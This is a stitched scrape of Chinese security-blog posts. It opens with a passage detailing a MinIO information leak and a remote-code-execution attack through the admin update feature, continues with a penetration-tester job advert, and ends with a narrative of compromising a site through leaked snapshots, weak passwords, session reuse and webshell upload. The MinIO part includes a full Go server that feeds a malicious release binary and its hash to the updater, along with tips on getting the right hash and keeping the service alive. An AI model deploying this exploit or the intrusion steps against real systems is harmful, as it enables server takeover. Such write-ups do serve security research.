跟到上面，会判断globalIsDistErasure是否为真，为真才注册路由

这个参数是，只有在分布式运行的时候才为true

为了方便测试，我们直接把 if globalIsDistErasure改成 if true，然后重启

信息泄露 Get~

2.RCE

在找环境变量搜索os的时候，找到了一个相当有rce潜力的函数

可以重启整个进程，查找调用此方法的地方

在这里监听了的一个chan，如果受到消息是serivceRestart，进程就会重启

继续跟进，一共有五个通道会写入消息

找到一个函数

整体来看会接受updateURL方法然后下载、检验、重启

下载

校验

重启

本来想尝试手动访问这个API的，但是认证过程实在是复杂。上官网看文档，发现一个官方封装好的

https://min.io/docs/minio/linux/reference/minio-mc-admin.html

下载mc客户端配置alias

尝试直接更新，报了一个错

parseReleaseData返回了err 跟进函数看看

分割字符串校验信息

根据校验函数构造一个更新服务信息

package main
import (    "net/http"    "os")
//func main() {//    cmd := exec.Command("sh", "-c", "open -a Calculator")//    cmd.Run()//}
func main() {    http.HandleFunc("/info", Evil)    http.HandleFunc("/minio.RELEASE.2023-05-22T03-08-07Z", evil)    http.ListenAndServe("0.0.0.0:8000", nil)}
func Evil(w http.ResponseWriter, r *http.Request) {    println("info")    w.Write([]byte("9ff209a2e3f9b9d61cb26e4c9953e8ce4985f1073120ed7794b0337033174e89 minio.RELEASE.2023-05-22T03-08-07Z\n"))}
func evil(w http.ResponseWriter, r *http.Request) {    println("evil")    b, _ := os.ReadFile("main")    w.Write(b)}

注意minio.RELEASE.2023-05-22T03-08-07Z这里的日期要比minio运行的日期要新，这里的sha256

随便写一个，报错会告诉你正确的sha256，后面的就是正确的

然后执行

成功~

但是千万要注意，这个exp会覆盖minio的文件，服务会挂掉的。推编译一个minio最新版然后把自己的代码加入到里面。然后打，这样服务不会挂。

阅读原文

跳转微信打开

武汉绿盟-高级渗透攻防驻场工程师招聘(12k-18k)

Sun, 23 Apr 2023 08:00:00 +0800

2023-04-23 08:00 浙江

武汉绿盟-高级渗透攻防驻场工程师招聘(12k-18k)

招聘要求：

•对授权项目进行深度渗透测试,不限制渗透手法。•对常见国内外主流软件系统进行漏洞挖掘。•长期在现场参与客户安全运维和漏洞挖掘工作。

岗位要求

熟悉常见的渗透手段，包括但不限于情报整合、边界打点、权限维持、建立隧道、内网移动等；

掌握各类常见web漏洞原理、利用、绕过和修复，有大型渗透攻防项目经验；

具备漏洞挖掘能力，可以独立挖掘各类高危漏洞；

具备威胁溯源能力，能够独立编写高质量溯源报告；

能够从甲方角度理解安全运营工作，能够对企业安全运维和建设提出建议；

具备良好的理解分析能力和沟通能力，善于与他人沟通协作；

具备良好的文档编写能力。

加分项：

1.红蓝对抗经历；

2.各大SRC核心白帽子或有CVE漏洞提交记录；

3.对企业安全整体架构有一定认识，能够从安全能力评估和脆弱性分析的角度提出优化方案；

4.业务理解能力强，熟悉黑灰产情况、APT、黑灰产常用工具和威胁情报等。

联系方式

liaofangxing@nsfocus.com

阅读原文

跳转微信打开

记一次quake快照抓取到getshell目标

Mon, 03 Apr 2023 08:00:00 +0800

原创诚安 2023-04-03 08:00 浙江

记一次quake快照抓取到getshell目标

0x01背景

给的一个小程序，功能比较简单：

登陆的话，中文用户名（后来才知道的），所以按照常理来说，直接爆破，是需要蛮久的，毕竟还要知道该人员所在的分部门。

测试开始，常规porxifier+burp抓包：

0x02前台sql注入

前台登陆后发现个注入点，跑到了后台密码，但是加了salt，用hashcat跑了下弱口令，没跑出来，当前数据库用户也非dba。

一看就感觉是tp框架二开的，发现测试的域名为jcss.xxxxx.com，扫了一波目录，后台地址是backxxx，后台有一次性图形验证码，识别率不高，暴破比较难，又手试了一波弱口令，此路不通。

后面去查了下ip，是个阿里云，扫了下端口，发现只开了22，80，443，3306，8888。

0x03quake抓取旁站快照信息泄露+弱口令+getshell

既然是个云服务器，就想着先用hunter，fofa，quake去翻了下该ip历史的扫描信息，发现绑了很多域名，并且用quake看到了一张有意思的图。

这里直接看到开发留下的测试电话号码，是quake之前爬的记录。

但是现在访问无了：

这里就尝试了手机号+某弱口令，一发入魂，登陆进了前台：

猜了一下，后台肯定也是backxxx，然后手机号+某弱口令（普通用户，没啥功能点），admin+某弱口令，一发入魂：

找了个文件上传，一句话上去（但是无法绕过disable_functions）,只能看当前站的目录文件，权限还比较低，到这就先把它放一边了：

0x04旁站1后台弱口令-》接管目标站后台

然后测着测着就新发现zt.xxxxx.com后台的弱口令,并且可造成jcss后台的登录绕过，即使用其他网站认证成功session即可登录该系统后台网站（PHP实现多服务器SESSION共享的锅？）

zt.xxxxx.com与jcss.xxxxx.com 属于统一ip，并且系统使用框架相同。

测试登录zt.xxxxx.com的backxxx后台存在弱口令（admin/xxxxxxxx）

但是jcss.xxxxx.com的admin账户密码并非xxxxxxxx，且未被破解出来。

首先登陆zt.xxxxx.com/backxxxx,并获取cookie:

将PHPSESSID=sf8pxxxxxxxxxxxxxxx69iml02bd4替换到https://jcss.xxxxxxx.com/并访问https://jcss.xxxxxxxxxx.com/Backxxxxx/Subject/Category/index.html，登录成功

0x04目标站后台getshell

在后台找了蛮多上传点，发现都有白名单校验，但是还是在一个神奇的功能点，碰上了为数不多的扩展名后缀可自定义的情况：

直接上传，无法上传：

添加ext，上传绕过：

Getshell，可控制所有站群：

一个没想通的点：

阅读原文

跳转微信打开